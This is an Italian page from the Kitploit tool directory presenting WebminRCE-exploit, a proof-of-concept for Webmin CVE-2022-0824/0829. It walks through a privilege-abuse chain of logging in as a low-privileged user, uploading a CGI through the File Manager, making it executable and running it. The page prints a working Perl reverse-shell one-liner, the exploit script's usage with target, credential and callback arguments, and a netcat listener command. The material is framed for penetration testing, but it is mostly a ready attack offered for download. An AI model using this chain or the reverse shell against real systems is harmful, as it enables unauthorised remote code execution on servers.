Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
WebminRCE-exploit — CVE-2022-0824, CVE-2022-0829, exploit dei privilegi di File Manger | Kitploit
Strumenti/GitHubGitHub/gokul-ramesh/webminrce-exploit
Escalation di PrivilegiAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingStrumento di Accesso Remoto
GitHubgokul-ramesh/webminrce-exploit

WebminRCE-exploit

CVE-2022-0824, CVE-2022-0829, exploit dei privilegi di File Manger

Vedi Repository
23 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

WebminRCE-exploit

CVE-2022-0824, CVE-2022-0829 - exploit dei privilegi di File Manger

L'applicazione vulnerabile per testare questo PoC può essere trovata qui come immagine docker.
Prerequisiti:

  • Python3
  • Modulo Requests

Descrizione

Vulnerabilità

Controllo degli accessi improprio per l'esecuzione di codice remoto Gli utenti sicuri (utenti non privilegiati) possono accedere al modulo File Manager, che dovrebbe essere limitato per impostazione predefinita.

Payload dell'exploit

Utilizzare la vulnerabilità del controllo degli accessi improprio per caricare un file cgi sul server webmin.

Fase 1 (Autenticazione)

Autenticarsi e accedere al server con un utente sicuro/meno privilegiato.

Fase 2 (Scaricare il file sul server)

Utilizzare il modulo vulnerabile File Manager (/file-manager/http_download.cgi) per scaricare uno script Perl sul server.
Script Perl per ottenere una reverse shell:
root@kitploit:~
perl -e 'use Socket;$i="0.0.0.0";$p=1111;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

Fase 3 (Modificare i permessi)

Aggiungere il permesso di esecuzione al file (/file-manager/chmod.cgi)

Fase 4 (Eseguire il comando)

Basta chiamare il file caricato per eseguire lo script della reverse shell contenuto al suo interno.

Istruzioni per l'uso:

root@kitploit:~
  $ python3 cve-2022-0824.py --help
  
  usage: cve-2022-0824.py [-h] --host HOST --user USER --password PASSWORD
                        --Python_server PYTHON_SERVER --callback_url
                        CALLBACK_URL [--proxy PROXY]

optional arguments:
  -h, --help            show this help message and exit
  --host HOST           Host url(complete)
  --user USER           Username
  --password PASSWORD   Password
  --Python_server PYTHON_SERVER
                        Python httpServer with port
  --callback_url CALLBACK_URL
                        Callback ip and port
  --proxy PROXY         Proxy details

Esempio di utilizzo:

root@kitploit:~
$ python3 cve-2022-0824.py --host [Target_url] --user [Username] --password[Password] --Python_server [Filehosting Server Information] ----callback_url [<ip>:<port> for reverse shell connections] --proxy [Proxy server details - optional]
root@kitploit:~
$ python3 cve-2022-0824.py --host http://localhost:10000 --user usr --password usr --Python_server 192.168.43.228:9999 --callback_url 192.168.43.228:1234 --proxy http://127.0.0.1:8080

Nome utente e password sono per utenti sicuri (non privilegiati) Configurare il listener prima di eseguire lo script per ottenere la connessione reverse shell.

root@kitploit:~
$ nc -lvp <port>

Grazie a @faisalfs10x per l'exploit.

Scarica lo strumento